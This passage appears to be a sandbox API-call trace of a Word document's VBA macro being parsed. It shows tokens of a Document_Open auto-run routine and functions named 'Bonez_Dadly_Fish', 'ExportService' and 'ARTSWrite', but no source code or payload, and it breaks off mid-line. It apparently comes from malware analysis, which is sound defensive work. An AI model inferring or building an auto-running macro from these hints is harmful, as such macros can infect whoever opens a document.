lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr=" ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¡", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¢", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="£", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¤", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¥", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¦", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="§", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¨", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="©", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ª", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="«", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¬", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="­", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="®", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¯", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="°", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="±", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="²", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="³", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="´", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="µ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¶", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="·", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¸", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¹", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="º", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="»", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¼", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="½", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¾", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¿", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="À", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Á", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Â", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ã", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ä", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Å", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Æ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ç", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="È", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="É", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ê", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ë", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ì", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Í", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Î", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ï", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ð", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ñ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ò", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ó", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ô", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Õ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ö", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="×", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ø", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ù", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ú", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Û", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ü", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ý", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Þ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ß", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="à", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.157] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="á", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="â", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ã", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ä", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="å", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="æ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ç", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="è", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="é", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ê", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ë", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ì", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="í", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="î", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ï", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ð", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ñ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ò", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ó", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ô", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="õ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ö", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="÷", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ø", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ù", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ú", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="û", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ü", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ý", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="þ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ÿ", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.158] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.158] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.158] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb490130 [0030.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7668a90 [0030.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb490130, cbMultiByte=13, lpWideCharStr=0x7668a90, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0030.158] IMalloc:Free (This=0x7fefe015380, pv=0xb490130) [0030.158] IMalloc:Free (This=0x7fefe015380, pv=0x7668a90) [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x15) returned 0xb490130 [0030.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76d9580 [0030.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb490130, cbMultiByte=21, lpWideCharStr=0x76d9580, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0030.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76d95c0 [0030.159] IMalloc:Free (This=0x7fefe015380, pv=0xb490130) [0030.159] IMalloc:Free (This=0x7fefe015380, pv=0x76d9580) [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0030.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822b62, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0030.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822b62, cbMultiByte=13, lpWideCharStr=0x76d6148, cchWideChar=13 | out: lpWideCharStr="Document_Open") returned 13 [0030.160] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6850000 [0030.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_Fish") returned 0x10c952 [0030.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExportService") returned 0x106509 [0030.161] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6990000 [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ARTSWrite") returned 0x1085c8 [0030.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822bf6, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822bf6, cbMultiByte=9, lpWideCharStr=0x766cae8, cchWideChar=9 | out: lpWideCharStr="ARTSWrite") returned 9 [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nErrors") returned 0x1031c9 [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hDevice") returned 0x102826 [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0030.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Plug") returned 0x10ba29 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lpCurentBuffer") returned 0x103aff [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.189] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Plug") returned 0x10ba29 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.190] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Buffersize" | out: _Dst="Buffersize") returned 0x0 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Plug") returned 0x10ba29 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lpBuffer") returned 0x10963e [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Plug") returned 0x10ba29 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lpCurentBuffer") returned 0x103aff [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nErrors") returned 0x1031c9 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.190] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ret" | out: _Dst="ret") returned 0x0 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="art") returned 0x10750d [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s_write") returned 0x10cf35 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hDevice") returned 0x102826 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lpBuffer") returned 0x10963e [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.190] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.191] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ret" | out: _Dst="ret") returned 0x0 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sle") returned 0x10d462 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ep") returned 0x105d1e [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.191] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="ret" | out: _Dst="ret") returned 0x0 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Buffersize") returned 0x10f0d4 [0030.191] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Buffersize" | out: _Dst="Buffersize") returned 0x0 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lpBuffer") returned 0x10963e [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nErrors") returned 0x1031c9 [0030.191] strcpy_s (in: 